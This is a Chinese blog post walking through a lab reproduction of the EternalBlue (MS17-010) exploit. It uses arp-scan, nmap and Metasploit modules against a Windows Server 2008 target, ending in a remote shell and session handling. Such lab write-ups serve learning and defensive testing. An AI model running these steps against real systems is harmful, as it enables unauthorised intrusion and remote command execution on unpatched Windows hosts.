首页 > 其他分享 >永恒之蓝漏洞复现(ms17-010)

永恒之蓝漏洞复现(ms17-010)

时间:2024-03-25 11:23:54浏览次数:27  
标签:IP 192.168 010 漏洞 ms17 复现 162.146

永恒之蓝漏洞复现(ms17-010)
环境
信息收集
先扫描目标靶机IP
进入MSF查看是否存在永恒之蓝的漏洞
攻击

永恒之蓝漏洞复现(ms17-010)

环境

攻击机:kali

靶机:Windows Server 2008

信息收集

对ip进行收集开放什么端口

先扫描目标靶机IP

因为在同一个内网之中

所以可以使用arp-scan -l 进行查询

fig:

知道目标靶机IP(192.168.162.146)来进行更进一步的信息收集

fig:

nmap -sV -P- 192.168.162.146

使用nmap进行192.168.162.146IP下的全端口扫描

这里可以看出系统信息为Windows Server 2008

进入MSF查看是否存在永恒之蓝的漏洞

msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3

fig:

show options

查看选项

fig:

set RHOSTS 192.168.162.146

设置目标IP

fig:

存在永恒之蓝的漏洞

返回

攻击

使用攻击模块

search ms17-010

use 0

fig:

set RHOSTS 192.168.162.146

fig:

攻击成功

fig:

输入shell

进入cmd模式

fig:

exit 退出shell
background 把shell放入后台

fig:

重新连接

sessions -i 1

fig:

标签:IP,192.168,010,漏洞,ms17,复现,162.146
From: https://www.cnblogs.com/tree2698/p/18088714

相关文章

  • IT20262: APPLICATIONS FAIL WITH ERROR SQL30020N "0X124C"("0100") WHEN CONNECTING
    IT20262:APPLICATIONSFAILWITHERRORSQL30020N"0X124C"("0100")WHENCONNECTINGTHROUGHAGATEWAYhttps://www.ibm.com/mysupport/s/defect/aCI3p000000kFjD/dt158090?language=en_USDescriptionIf you have an application that connects......
  • PointNet++论文复现(二)【最远点采样-球查询-采样和分组 代码详解】
    最远点采样-球查询-采样和分组-代码详解专栏持续更新中!关注博主查看后续部分!最远点采样、球查询等位于pointnet2_utils.py定义点云坐标归一化点云坐标归一化是一种预处理步骤,用于将点云数据标准化到一个统一的尺度,通常是在一个特定的范围内,比如[-1,1]或[0,1]。这一......
  • PointNet++论文复现(一)【PontNet网络模型代码详解 - 分类部分】
    PontNet网络模型代码详解-分类部分专栏持续更新中!关注博主查看后续部分!分类模型的训练:##e.g.,pointnet2_ssgwithoutnormalfeaturespythontrain_classification.py--modelpointnet2_cls_ssg--log_dirpointnet2_cls_ssgpythontest_classification.py--log_di......
  • 【复现】【免费】基于多时间尺度滚动优化的多能源微网双层调度模型
    目录主要内容     部分代码     结果一览   1.原文结果2.程序运行结果下载链接主要内容   该模型参考《CollaborativeAutonomousOptimizationofInterconnectedMulti-EnergySystemswithTwo-StageTransactiveControlFramework》,主要解决的......
  • 洛谷P3498 [POI2010] KOR-Beads 题解
    P3498[POI2010]KOR-Beads对于数列${A_i}$,求$k$使数列被分为$\lfloor\frac{n}{k}\rfloor$个部分后不同子数列种类最多(子串翻转前后为一类子串)很容易想到:枚举$k\\in\[1,n]$,记录每个$k$下不同种类数,然后取最优即可,那么问题来了:如何计算种类数?暴戾算法:一种纯......
  • 【漏洞复现】福建科立迅通信指挥调度平台pwd_update.php SQL注入漏洞 (CVE-2024-2621)
        免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。          ......
  • 洛谷题单指南-集合-P1525 [NOIP2010 提高组] 关押罪犯
    原题链接:https://www.luogu.com.cn/problem/P1525题意解读:有很多罪犯,要关到两座监狱,有一些罪犯之间有仇,并且可以量化出仇恨值,如果关在一起就会冲突,造成的影响就是仇恨值,要使得造成的影响最小,如果可以完全不起冲突,输出0。解题思路:首先,要让冲突影响最小化,显然应该把仇恨大的罪犯......
  • 永恒之黑复现
    永恒之黑复现一.永恒之黑介绍原理2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,没有检查长度是否合法,最终导致整数溢出,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,攻......
  • Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)复现
    先从镜像站拉取OracleWebLogicServerJNDI注入漏洞(CVE-2024-20931)然后在docker中启动这个镜像即可在网页中访问,搭建网站成功使用利用工具来进行验证是否存在漏洞获取DNS查看是否有回显有回显漏洞存在创造反弹shell,先查看攻击机的ip进行反弹shell编码使用nc开启监听端......
  • 前端学习-vue视频学习010-生命周期
    尚硅谷视频教程组件的生命周期创建挂载更新销毁在特定的时期调用特定的函数,即生命周期vue2的生命周期4个周期,对应8个钩子(生命周期函数)创建:创建前、创建完毕挂载:挂载前、挂载完毕更新:更新前、更新完毕销毁:销毁前、销毁完毕<script>exportdefault{//eslint......